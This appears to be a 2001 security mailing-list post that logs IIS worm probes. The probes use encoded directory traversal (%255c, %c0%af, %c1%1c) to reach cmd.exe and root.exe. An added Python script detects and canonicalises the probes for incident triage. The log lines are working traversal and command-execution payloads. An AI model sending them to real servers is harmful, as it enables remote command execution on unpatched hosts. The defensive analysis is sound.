Rekindled sploit scanning?

From: Aj Effin Reznor (ajat_private)
Date: Tue Sep 18 2001 - 07:08:04 PDT


    Looks like a fair amount of traffic this morning amongst compromised NT/2k boxen.
    
    The 63.x.y.z as well as the 65.x.y.z is seeing a fair amount of traffic, similar to the following:
    
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 383 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
    aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
    
    
    Log times are PST.
    
    
    -aj.
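The requests above all try to reach cmd.exe or root.exe through the IIS /scripts and /msadc directories, hiding the "..\" traversal behind double percent-encoding (%255c, %25%35%63, %%35%63) and overlong or malformed UTF-8 (%c0%af, %c1%1c, %c1%9c). A log reviewer wants those variants collapsed to one canonical path so the probes can be counted and, more importantly, so any that returned 2xx stand out from the 404/400 noise. The script below is an added example, not code from the post or from SecurityFocus; it re-uses a handful of the poster's own log lines (source anonymised as aa.bb.cc.dd) as constructed input, and its lenient UTF-8 decoder is a deliberately simplified model of permissive decoding, not the actual IIS implementation.

```python
import re
from urllib.parse import unquote_to_bytes

# Log lines copied from the post above (Apache combined format; source address
# anonymised as aa.bb.cc.dd by the poster), plus one constructed benign request.
# A real run would read the web server's access log instead.
SAMPLE_LOG = '''\
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:28:02 -0700] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

SUSPICIOUS_FILES = {"cmd.exe", "root.exe"}


def lax_utf8_decode(data):
    """Simplified model (an assumption, not IIS's real decoder) of permissive UTF-8
    decoding: a 2-byte lead (0xC0-0xDF) is combined with the low six bits of the NEXT
    byte without checking that it is a valid continuation byte, so %c0%af and %c0%2f
    become '/' and %c1%9c and %c1%1c become '\\'. A strict decoder rejects all four."""
    out = []
    i = 0
    while i < len(data):
        c = data[i]
        if 0xC0 <= c <= 0xDF and i + 1 < len(data):
            out.append(chr(((c & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(c))  # ASCII, or any other byte passed through unchanged
            i += 1
    return "".join(out)


def canonical_path(raw_path):
    """Collapse the evasions seen in the post: percent-decode twice (undoes %255c,
    %25%35%63 and %%35%63), decode overlong UTF-8 leniently, then unify separators."""
    once = unquote_to_bytes(raw_path)
    twice = unquote_to_bytes(once)
    return lax_utf8_decode(twice).replace("\\", "/")


def classify_request(target):
    """Return the reasons a request target looks like this scan (empty list if clean)."""
    path = target.split("?", 1)[0]
    decoded_once = unquote_to_bytes(path)
    canon = canonical_path(path)
    reasons = []
    if b"%" in decoded_once:
        reasons.append("double-encoded")          # a '%' survived one decode pass
    if any(b >= 0x80 for b in decoded_once):
        reasons.append("non-ascii-bytes")         # overlong/invalid UTF-8 candidates
    if "/../" in canon or canon.endswith("/.."):
        reasons.append("traversal")
    if canon.rsplit("/", 1)[-1].lower() in SUSPICIOUS_FILES:
        reasons.append("shell-executable")
    return reasons


def scan_log(text):
    """Parse combined-format lines and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["target"])
        if reasons:
            alerts.append({"ip": m["ip"], "status": int(m["status"]),
                           "canonical": canonical_path(m["target"].split("?", 1)[0]),
                           "reasons": reasons})
    return alerts


def summarize(alerts):
    """Per source address: probe count and how many got a 2xx. That second number is
    what triage cares about; the post's 404/400 responses mean the probes found nothing."""
    summary = {}
    for a in alerts:
        s = summary.setdefault(a["ip"], {"probes": 0, "succeeded": 0})
        s["probes"] += 1
        if 200 <= a["status"] < 300:
            s["succeeded"] += 1
    return summary


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["ip"], a["status"], a["canonical"], ",".join(a["reasons"]))
    print(summarize(found))
```

On the sample input every one of the five probe lines canonicalises to /scripts/root.exe or /scripts/../../winnt/system32/cmd.exe and the benign /index.html request is ignored; a host that answered any of the probe patterns with a 2xx would show up as succeeded > 0 and is the one to pull off the network and image, not the ones returning 404.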
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:00:58 PDT